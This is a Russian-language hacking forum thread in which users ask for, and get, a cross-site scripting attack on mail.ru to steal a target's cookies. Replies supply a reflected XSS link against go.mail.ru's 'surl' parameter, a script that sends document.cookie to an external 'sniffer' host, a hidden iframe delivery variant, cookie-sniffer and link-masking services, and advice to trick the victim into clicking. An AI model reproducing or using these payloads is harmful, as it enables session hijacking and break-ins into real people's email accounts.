Подкиньте пожалуста Xss на mail.ru зарание спасибо=)

А на go.mail.ru нормально будет 8) В Баги на сайтах кинул. Вот - http://forum.antichat.ru/showthread.php?p=155788#post155788

Профиксили уже =(

Какое пофиксили!? Пробелы все в ссылке убери.

Go0o$E спасибо объясните плиз как её использовать ?? чтобы украсть куки

Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:
<srcipt src=http://site.ru/js.js></script>
В самом файле js.js

img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;

Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например

<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">

Что не понятно - спрашивай.

Green_Bear в спасибо огромное)) я уж думал что ппц

А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.

iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.

А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.

iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.
Додумался, я дал пример использования пассивной ксс, а не в теле письма его присылать :)

em00s7, ты должен отослать тому челу, которого хочешь взломать такую ссылку:

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E

Ну и применить СИ, чтобы он её открыл.

Что делать с http://site.ru/js.js, объяснил Green_Bear.

а активной у вас нету??

Green_Bear]Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:
<srcipt src=http://site.ru/js.js></script>

Непонятно в каком параметре????

В самом файле js.js

img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;


Это надо создать файл и положить на сервак где выполняются скрипты??

Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например

<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">


И куда этот инфрейм вставлвть???
Толке не говорите в Ж.... :confused:

Непонятно в каком параметре????


Например в данной xss уязвимый параметр surl

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E



Это надо создать файл и положить на сервак где выполняются скрипты??

Да.


И куда этот инфрейм вставлвть???
Толке не говорите в Ж.... :confused:

В поле сообщения. Не забудь отослать в формате HTML.

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E

А это куда???

а прокси обязательно использовать ?